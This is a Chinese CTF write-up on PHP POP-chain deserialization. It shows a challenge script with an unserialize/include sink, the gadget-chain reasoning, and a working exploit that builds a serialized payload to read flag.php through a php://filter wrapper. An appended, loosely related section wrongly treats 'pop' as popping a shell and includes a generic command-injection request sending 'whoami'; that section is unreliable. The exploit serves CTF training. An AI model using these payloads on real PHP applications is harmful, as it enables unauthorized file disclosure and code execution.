ctf-pop链

POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。

__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

代码 

<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/ 

首先这里传入数据的入口是反序列化,那就是__wakeup(),出口那就是要读取文件,那就是 __invoke()和_show() ,一个是魔法方法,一个是普通方法。 

1.首先看到unserialize($_GET['wish'])将get传参的wish进行了反序列化操作。那么将会调用到Road_is_Long类中__weakup方法。
2.因为 $this->page = "index.php" page被当做字符串所以调用Road_is_Long类中的__to string.
3. ** return $this->string->page ** page属性不存在所以调用Road_is_Long类中的 get方法。
4. ** $function = $this->effort;
return $function(); **
把取出来的effort当做还是调用因此又会引起调用了 Try_Work_Hard类中的__invoke方法,其中就可以把文件读取出来了。

exp

<?php

class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    } 
}

class Road_is_Long{
    public $page;
    public $string;
    }
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
} 
$a = new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();
$a->page=$b;
$b->string=$c;
$c->effort=$d;
echo urlencode(serialize($a));


?>

 

 

### CTF Web 类目中的 Pop Challenge 解析 在CTF竞赛中,“Pop”通常指的是获取目标系统的shell访问权限,这可以是通过各种漏洞利用实现的。对于Web类目的挑战而言,`pop_master`案例提供了一个具体的实例[^1]。 #### pop_master 挑战解析 此部分涉及名为 `pop_master` 的具体挑战,在该挑战中参与者需面对一系列复杂的攻击面来尝试获得服务器端控制权。题目描述指出存在某种机制允许远程代码执行的可能性,而解题思路则围绕着发现并利用这一特性展开。 为了成功完成此类任务,参赛者往往需要: - **识别潜在入口点**:寻找应用程序逻辑错误、未受保护的功能接口或是配置失误之处。 - **构建有效载荷(Payload)**:设计能够突破现有防护措施的有效载荷,比如绕过输入验证或过滤规则等技术手段[^3]。 - **测试与调整**:不断迭代优化自己的方法直至找到可行路径达成最终目标——即“弹出盒子”,意味着取得了预期级别的交互式会话或者更高层次的操作权限。 ```python import requests # 假设已知某参数可被用于RCE, 下列代码仅为示意如何发送恶意请求 url = "http://example.com/vulnerable_endpoint" payload = {'cmd': 'whoami'} # 这里应替换为实际可用的命令字符串 response = requests.post(url, data=payload) print(response.text) ``` 上述Python脚本展示了向可能存在命令注入风险的服务发起POST请求的方式;当然真实环境中还需考虑更多因素如编码转换、字符集处理等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值